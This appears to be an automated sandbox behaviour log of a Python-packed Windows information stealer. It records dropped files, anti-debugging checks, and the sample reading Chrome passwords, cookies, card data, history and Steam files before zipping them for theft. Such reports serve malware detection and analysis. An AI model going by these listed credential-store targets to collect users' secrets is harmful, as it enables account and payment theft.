Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_zoneinfo.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tk86t.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libffi-7.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tcl86t.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_zoneinfo.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tk86t.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_tkinter.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Code function: 1_2_00007FFD3FBE4241 rdtsc

1_2_00007FFD3FBE4241

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

API coverage: 1.3 %

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 1_2_00007FFD3FBE3229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,		1_2_00007FFD3FBE3229
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE3229 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,		2_2_00007FFD3FBE3229

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: test.exe, 00000001.00000002.230354520.00000000018C7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 1_2_00007FFD3FBE4241	1_2_00007FFD3FBE4241
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 1_2_00007FFD3FBE572C	1_2_00007FFD3FBE572C
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE4241	2_2_00007FFD3FBE4241
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE572C	2_2_00007FFD3FBE572C

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Code function: 1_2_00007FFD3FBE5A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00007FFD3FBE5A1F

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004016D0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004016D0

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

Code function: 1_2_00007FFD3FBE4241 rdtsc

1_2_00007FFD3FBE4241

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040114B GetStartupInfoA,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,exit,_cexit,	0_2_0040114B
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 1_2_00007FFD3FBE5A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFD3FBE5A1F
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE5A1F IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFD3FBE5A1F

HIPS / PFW / Operating System Protection Evasion

DLL side loading technique detected

Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_e4da93291059d8fb\comctl32.dll			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_e4da93291059d8fb\comctl32.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\user-st.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Programs\Steam VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Programs\Steam VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Configuration.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\monitor-1.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\System\Processes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\user-st.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\user-st.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Chrome Default Passwords.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Chrome Default Cookies.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Chrome Default Cards.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Chrome Default History.db VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default History.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Chrome Default Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Chrome Default Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Chrome Default Bookmarks VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\manifest.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\manifest.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\manifest.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\manifest.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink\Browsers\Chrome\Default Extensions.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\AppData\stink VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
